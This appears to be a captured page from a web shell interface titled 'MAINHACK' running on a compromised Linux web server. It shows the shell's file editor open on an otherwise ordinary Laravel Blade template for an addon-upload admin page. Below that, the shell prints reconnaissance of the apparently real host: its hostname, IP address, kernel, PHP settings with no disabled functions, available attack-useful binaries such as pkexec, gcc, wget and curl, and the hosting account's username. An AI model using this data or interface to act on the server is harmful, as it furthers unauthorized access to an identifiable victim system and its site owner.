[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: index.blade.php
@extends('layouts.master') @section('title') {{ __('Addons List') }} @endsection @section('main_content') <div class="erp-table-section"> <div class="container-fluid"> <div class="card"> <div class="card-bodys"> <div class="table-header p-16"> <h4>{{ __('Addons List') }}</h4> <a type="button" href="#addon-modal" data-bs-toggle="modal" class="add-order-btn rounded-2 active" class="btn btn-primary"> <i class="fas fa-plus-circle me-1"></i> {{ __('Install / Update Addon') }} </a> </div> </div> <div class="responsive-table mt-3"> <table class="table" id="datatable"> <thead> <tr> <th>{{ __('SL') }}</th> <th>{{ __('Name') }}</th> <th>{{ __('Version') }}</th> <th>{{ __('Status') }}</th> </tr> </thead> <tbody id="addon-data" class="searchResults"> @include('admin.addons.search') </tbody> </table> </div> </div> </div> </div> @endsection {{-- Create Modal --}} <div class="modal modal-md fade" id="addon-modal" tabindex="-1" aria-labelledby="exampleModalLabel" aria-hidden="true"> <div class="modal-dialog"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="exampleModalLabel">{{ __('Install / Update Addon') }}</h5> <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button> </div> <div class="modal-body"> <form action="{{ route('admin.addons.store') }}" method="post" enctype="multipart/form-data" class="ajaxform_instant_reload"> @csrf <div> <label>{{ __('Enter purchase code') }}</label> <input type="text" name="purchase_code" class="form-control" placeholder="{{ __('Enter addon purchase code') }}" required> </div> <div class="mt-3"> <label>{{ __('Upload addons zip file') }}</label> <input type="file" name="file" class="form-control" accept="file/*" required> </div> <div class="col-lg-12"> <div class="button-group text-center mt-5"> <button type="reset" class="theme-btn border-btn m-2">{{ __('Cancel') }}</button> <button class="theme-btn m-2 submit-btn">{{ __('Install') }}</button> </div> </div> </form> </div> </div> </div> </div>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.84 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002